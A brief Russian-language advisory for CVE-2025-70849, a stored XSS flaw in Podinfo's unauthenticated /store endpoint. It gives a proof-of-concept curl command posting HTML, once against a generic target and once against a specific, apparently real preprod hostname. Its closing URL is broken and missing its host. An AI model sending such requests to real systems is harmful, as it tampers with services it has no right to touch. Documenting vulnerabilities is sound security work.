
CVE-2025-70849: Хранимая XSS в Podinfo
Уязвимость безопасности (CWE-79) была обнаружена в Podinfo, веб-приложении для демонстрации микросервисов Kubernetes. Функция /store позволяет неаутентифицированным пользователям загружать произвольное содержимое HTML/JS, что приводит к хранимому XSS.
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'

Получите доступ к возвращённому хешу: https:///store/